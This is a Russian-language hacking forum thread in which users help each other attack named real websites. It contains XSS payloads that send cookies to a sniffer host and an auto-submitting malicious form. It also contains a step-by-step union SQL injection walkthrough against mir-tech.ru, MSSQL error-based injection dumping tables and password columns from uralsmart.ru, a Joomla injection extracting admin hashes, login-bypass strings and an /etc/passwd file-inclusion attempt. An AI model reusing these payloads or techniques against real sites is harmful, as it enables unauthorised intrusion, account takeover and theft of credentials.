я дурак )) не стер в сайт в ошибке ))) вот ламер то )).... P.s. сокс 5 стоит... врятли бы свычислили ))... я понимаю что все-таки есть риск , но просто выдалась ошщибка , я то ясное дело не буду дальше углублятся потому что не дурак понимаю что могут вычислить... ну если рассматривать все-таки данную ошгибку что мона из нее полезное извлечь предположим эот не сайт федеральной налогой слуджбы а другой.... что мона применить?? просто для интереса ...
У меня такой вопрос. Как заставить вот это работать Code: [img]http://site.ru/sniffer/lol.jpg"+javascript:document.cookie;[/img] Когда я посылаю сообщение на сайте,то фотку не видно,REFERER работает а вот document.cookie нет поскольку не правельно изложено. Пытался по разному,и так тоже Code: [img]http://site.ru/sniffer/lol.jpg"+javascript:alert(document.cookie);[/img] но без изменений,кукис не достаёт падла. html отключён там,прочерк тоже не канает там. что посоветуете ?
Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все SQL inj появляется тогда, когда написано что sql error... и то не всегда Nazaret2005 <script>img = new Image(); img.src = "http://site.ru/sniffer/lol.jpg?"+document.cookie;</script> ?
Basurman - Я же написал,что html и прочерки не возможны... По этому не получается... P.S вот так у него построино. PHP: function comment($text, $strip_html = true) { $s = $text; $s = str_replace(";)", ":wink:", $s); if ($strip_html) $s = htmlspecialchars_uni($s); $bb[] = "#\[img\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#i"; $html[] = "<img class=\"linked-image\" src=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />"; $bb[] = "#\[img=([a-zA-Z]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is"; $html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />"; $bb[] = "#\[img\ alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is"; $html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />"; $bb[] = "#\[img=([a-zA-Z]+) alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is"; $html[] = "<img class=\"linked-image\" src=\"\\3\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />"; $s = preg_replace($bb, $html, $s); return $s; } ну а это выводит результат PHP: " . comment($member["info"]) . "
я понял что это не скуль инъекция, ))) мне интересно может мона ьулдет заюзать как нить php инклуд или что то еще,не зря же ошибька выдается.
вот нашел я локальний инклуд http://www.polarion.org/index.php?page= и чегото никак не получается прочитать etc/passwd Как ето там реализировать )
Вот SQL-inj _http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1 Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно первым делом делаешь следующее http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 )) http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец )) http://mir-tech.ru/group.php?cat=-1+union+select+1/* вот выдал тебе единичку )) далее чстобы узнать версию http://mir-tech.ru/group.php?cat=-1+union+select+version()/* 5.0.41-log )) вот она легко ломается )) если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html )) а так можешь потсучаться в асю 896353 ) http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema.tables+limit+3,1/* таким образом перебираешь таблицы )) вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )
Всем доброй ночи. У меня как обыно появился глупый вопрос. Вообще суть такая, нашел я пасивную хсс, в поиске на одном сайте. но, я никак не могу потделать ссилку со своим запросом, так как ссилка после поиска имеет вид http://site.com/search/ . и все, тишина... Не смогу же я заставить человека вбить в поиск мой скрипт. Кто скажет как мне замутить ссылку чтобы все исполнялось по красоте? Спасибо.
попробуй изменить метод отправки формы на get. если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания: Code: <form method=post action=http://example.com/ id=form1 > <input name=search value='"><script>alert()</script>'/> </form> <script for=form1 event=load >form1.submit()</script> где action для формы и name для input ввозьмешь с уязвимого сайта.
У меня вопрос по MSSQL Есть сайт, на нём есть inj, стоит MSSQL. Мне нужно выбить имена таблиц, но на страницу ответы из запросов не выводятся... Тоесть я пишу UNION SELECT 1,2-- он выводит пустую страницу, тоесть всё ОК! В если напишу UNION SELECT 1,2,3 Выводит Microsoft OLE DB Provider for SQL Server error '80040e14' All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. Тоесть он показывает ошибку! Вопрос: Нельзя как-нибудь задать запрос, чтобы ответ вывелся как ошибка?
Почитай статью КЕША. http://forum.antichat.ru/showthread.php?t=30501 Там без юнион. Мне очень помогла статья, многие скули удалось провести.
Короче есть такой сайтец : uralsmart.ru(провайдр кокойто) на нем есть mssql injection: http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHEMA.tables)-- провожу я - узнал все таблы: 'aSellers','aResponsiblePersons', 'eAuth_Groups',%20'eAuth_Groups_Members', %20'eNotify_Log','ePage_Trans','eRoles',%20 'eRoles_Functions','syssegments','eRoles_Objects ','sysconstraints','aBlanks','aTariffs_Ethernet',' aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk', %20'aSharpdesignPortfolio','aTariffs_IPtel_World', 'xSearch_Pages','xSearch_Triads','xSearch_Words', %20'eAuth','ePage','aTariffs_Dialup','vmNews',' dtproperties',%20'aHotLinks','zForms_Fields',' aSellers_Groups',%20'zForms_Forms','MainMenu',' votes','votes_answers','aHotImgs','mNews',%20 'Results','vAuth','vAuth_Active_NT',' vAuth_Active_Post','mWishBook_Groups', 'vAuth_Active_Cookies'%20,%20'mWishBook_Messages', 'aConnectZones','aSellers_Districts','mNews_Maillist' то что я нашел...(колумны я не стал писать) - но вот есть трабл: Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd... Вот проблема: колумн name я вывожу - се окей а вот дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd? Там еще много таблиц с колумноми pwd и все они выбрасыват....Help
есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
На сайте под управлением joomla есть уязвимость http://site.com/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/* Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера? Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"
На Insert Into скорее всего нет прав, а Update не прокатит ибо после юноина тока селект мона и подзапросы все тоже с селектом только
Хех... попробуй Code: ' or 'a'='a' LIMIT 0,1 /* затем Code: ' or 'a'='a' LIMIT 1,1 /* пока не найдещь того юзера который тебе нужен...
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос 1+or+1=(SELECT+TOP+1+Login+from+admin)-- он успешно выполняется, я вижу логин, затем пишу 1+or+1=(SELECT+TOP+1+PassHash+from+admin)-- и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся Помогите, плиз!
Аналогичная ситуация (uralsmart.ru) тока кого спрашиал - никто не помог...Там конф видать не дает вывод делать... Так что все...